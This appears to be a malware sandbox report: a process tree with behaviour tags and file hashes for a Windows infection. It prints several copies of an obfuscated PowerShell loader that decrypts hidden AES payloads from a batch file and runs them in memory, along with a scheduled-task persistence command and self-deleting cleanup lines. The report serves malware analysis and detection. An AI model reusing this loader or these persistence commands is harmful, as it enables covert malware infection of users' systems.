swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);8⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(788);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "tqnyya" /tr "C:\Users\Admin\AppData\Roaming\tqnyya.bat"9⤵
- Creates scheduled task(s)
PID:3168
-
-
-
-
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\tqnyya.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\tqnyya.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Users\Admin\AppData\Roaming\tqnyya.bat.exe"C:\Users\Admin\AppData\Roaming\tqnyya.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1972);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\tqnyya.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\tqnyya.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Users\Admin\AppData\Roaming\tqnyya.bat.exe"C:\Users\Admin\AppData\Roaming\tqnyya.bat.exe" -w hidden -c $ZiYB='TWHQYraWHQYnsWHQYfoWHQYrmFiWHQYnalWHQYBloWHQYckWHQY'.Replace('WHQY', '');$TWWf='CreWHQYateWHQYDeWHQYcryWHQYptWHQYorWHQY'.Replace('WHQY', '');$JFEq='LoWHQYadWHQY'.Replace('WHQY', '');$PgsW='GetWHQYCuWHQYrWHQYreWHQYntWHQYPrWHQYoWHQYceWHQYssWHQY'.Replace('WHQY', '');$tNsL='LaWHQYstWHQY'.Replace('WHQY', '');$GjzR='MaiWHQYnWHQYModuWHQYleWHQY'.Replace('WHQY', '');$aRAn='SpWHQYlitWHQY'.Replace('WHQY', '');$TNHv='IWHQYnWHQYvokWHQYeWHQY'.Replace('WHQY', '');$QZWA='EntWHQYrWHQYyPoWHQYintWHQY'.Replace('WHQY', '');$vNAk='FroWHQYmBaWHQYsWHQYe6WHQY4SWHQYtriWHQYngWHQY'.Replace('WHQY', '');$UYdq='ReWHQYaWHQYdLiWHQYnWHQYeWHQYsWHQY'.Replace('WHQY', '');$JZFz='ChWHQYangWHQYeWHQYExtWHQYensiWHQYoWHQYnWHQY'.Replace('WHQY', '');function swdxJ($huXUQ){$dLULt=[System.Security.Cryptography.Aes]::Create();$dLULt.Mode=[System.Security.Cryptography.CipherMode]::CBC;$dLULt.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$dLULt.Key=[System.Convert]::$vNAk('g+qN2trIRo/tbHFrQCd/eQDgIirzmSlbfVKkYlD3YWc=');$dLULt.IV=[System.Convert]::$vNAk('eff0gny3xfxcI+yMk6XV2Q==');$lfKNS=$dLULt.$TWWf();$QwlmH=$lfKNS.$ZiYB($huXUQ,0,$huXUQ.Length);$lfKNS.Dispose();$dLULt.Dispose();$QwlmH;}function ktBmv($huXUQ){$NioEV=New-Object System.IO.MemoryStream(,$huXUQ);$xipLu=New-Object System.IO.MemoryStream;$BScFk=New-Object System.IO.Compression.GZipStream($NioEV,[IO.Compression.CompressionMode]::Decompress);$BScFk.CopyTo($xipLu);$BScFk.Dispose();$NioEV.Dispose();$xipLu.Dispose();$xipLu.ToArray();}$zaZHN=[System.Linq.Enumerable]::$tNsL([System.IO.File]::$UYdq([System.IO.Path]::$JZFz([System.Diagnostics.Process]::$PgsW().$GjzR.FileName, $null)));$GGCVp=$zaZHN.Substring(2).$aRAn(':');$GwZBd=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[0])));$gptFX=ktBmv (swdxJ ([Convert]::$vNAk($GGCVp[1])));[System.Reflection.Assembly]::$JFEq([byte[]]$gptFX).$QZWA.$TNHv($null,$null);[System.Reflection.Assembly]::$JFEq([byte[]]$GwZBd).$QZWA.$TNHv($null,$null);3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4652);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
Filesize
560B
MD547eba8a13be6a3eff8eca194f9969071
SHA1acd481839a19d948bf65d8e30e81b286c3874b2b
SHA25600db64c86eae688cf755ac26c07a930544c92cc2a25bb8b3e31380628732d8a7
SHA5120a0c36891f81d8809be0a5c9e76bf140069e7a161a79ce9de68c5f7fc3101df0ba4860582133d01a0aabb1248189a9920b4e453d3f95a468d69987bfb4c3c1b3
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
74KB
MD5eb336ada634ab05e0ee2319de53f28d9
SHA16b90b17327236357996c2cda2e341a59bbe1177f
SHA256ac9385e93103cf61717de999cb0e9ad035d311af09f0c02b1f46ef99fb5fa793
SHA512dac81bce58bc4c76acdb8e0e3c1489cd822cd65de5aa7a5b1b61c2f11e85fce52a487cabdf6ceff6d78093fa5e9237f309f903cb32637fac062773480c643e95
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b